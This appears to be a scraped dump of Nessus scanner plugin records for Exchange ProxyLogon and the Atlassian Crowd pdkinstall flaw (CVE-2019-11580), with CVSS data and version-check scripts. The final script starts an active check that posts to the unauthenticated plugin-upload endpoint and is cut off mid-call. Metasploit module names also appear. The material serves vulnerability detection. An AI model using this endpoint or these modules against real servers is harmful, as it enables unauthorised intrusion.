script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyLogon RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.12',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 16,\n 'min_version': '15.01.1979.0',\n 'fixed_version': '15.01.1979.8',\n 'kb': '5000871'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 18,\n 'min_version': '15.01.2106.0',\n 'fixed_version': '15.01.2106.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 19,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.9',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': '15.02.529.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 5,\n 'min_version': '15.02.595.0',\n 'fixed_version': '15.02.595.8',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 6,\n 'min_version': '15.02.659.0',\n 'fixed_version': '15.02.659.12',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 7,\n 'min_version': '15.02.721.0',\n 'fixed_version': '15.02.721.13',\n 'kb': '5000871'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 3,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.10',\n 'kb': '5000871'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:01", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98657", "href": "https://www.tenable.com/plugins/was/98657", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:01", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98658", "href": "https://www.tenable.com/plugins/was/98658", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:02", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98656", "href": "https://www.tenable.com/plugins/was/98656", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:03", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98659", "href": "https://www.tenable.com/plugins/was/98659", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T13:14:27", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:19:09", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-22T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "701078.PRM", "href": "https://www.tenable.com/plugins/nnm/701078", "sourceData": "Binary data 701078.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:03", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98660", "href": "https://www.tenable.com/plugins/was/98660", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T15:23:44", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_CVE-2019-11580.NASL", "href": "https://www.tenable.com/plugins/nessus/138553", "sourceData": "#TRUSTED 6f729eeb0b631f29f61528c423f7ec5a93d4b0afc791e4d4c4b58141626811f75e4353fb4630527672103ff47f905ae471d77d0f134111256452e62cf2bdb10ccf042c8083311a88a76bd9237d7e01a690dd1a3824eb070b90edbcfdc4c8c21224df40f2d714bf04ba8ec97c082da6a6dd3262657956fe92e1f9e8f8414fa5ee9a8e42191ed5ab3648c4676005ce689a7c28e0caa0cee92f6b5646326f1b2c3564f437c1a9d332a2f0f3aeef2cf8b594858d7cfac9ae7dc438ce007e932ac4470ef2a8718b50de16a71e8a3409ed3ae53c13fa94ae6a422772d6a466f35a8e345e82bb38b2788448211e1bba39c6a4cd16140e6a26309a52e11fdb44521730d2a3380317afeea12bfe2f1cd23567ef1e338a4b850f9566be11748eb398feea69ad87f5c38ccd5f75369935f30cfc5a81097fdd8435aec9e160779010bb47e78cd1705fa921dd9205698af6292b51c1a2d1fec977b3a852011ca2fe57254ddcf14ba923d8322df0510cfbf8059b3f5633d678314921410d6a6e4eb3167b5b0d3a7df2a2142ba19eb5a56f458bf0e6fbf869d53e6f3217af6463e3889ae1c0164c6c571d94816e9ecdffdf96015e905e23ee22e9ae93648c3271be24816c22f1af1c52c22b4a8cf3d572ba18f11a1a27a011573aa086c42727803075c4ffa9164690078567c7cb264884b9b4f49552d2ec48f1c10b423bd8e7cfb1dc3f6268df1b\n#TRUST-RSA-SHA256 ab8710d5ae60f23e24cb87038d7b1f5e38b91d715ee47f169afca1d4e7cc5ed1b79b3892bcdc3567bb329fd89bca5511ff3f5cc3c8d39aa4434daa75413a21dc6ed3b4915dc11af36719afa84e9790dc7a13d09276083aeffd40c083ff27138b2203465cbd803a38bbff99227b128c5e22355948193284ada4ea3be416a149ffa518ef65ce5c5c650c91ea35923a2e32976295f8c48b47f170b7077b8b2bd165828019780efdde467e7f0d2497a0a1b8fdd93eb547fdff4336b8f28c3762d4d3dcbb63e7b9f7c9567c2186bb1081d46b160353a9643ef71a11a5385fe5e5e15c99fa1d24bc2d052c7922143a7ba6d5cb50e90abd541ae53dda1b98a478376f99593c035631cb68369a78e88db84f0087dc1dc497440ab4dc8fb95644196c631b271af42cfaa1d1282c919adfb7ffca79a6e5748ac64ad6ab6d34c9c884a92e6aeeca2fb42d0a7d2e6ce8f599b9a23b70a77e0eb05855402ea482d003d99c11f3964337a77ca9e3b8a9317ab4642d00cec10aed585c8388c7693550247a1f786f36c7c43413e4dc4b1859b2c37aa46419104bbe009426ba1a900d37517988426eca246065261c87da67c98dbce44648049576dd0b32965f27e60e27e4daeea0c885c79540843b00f216641e28e7f185a66b452a12196da47b9abc9eaec5aed13a4ecd67f8495a87e44c389b51240b620d51f70ca7d02da4ed62de5519bc71a17d\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0571\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail 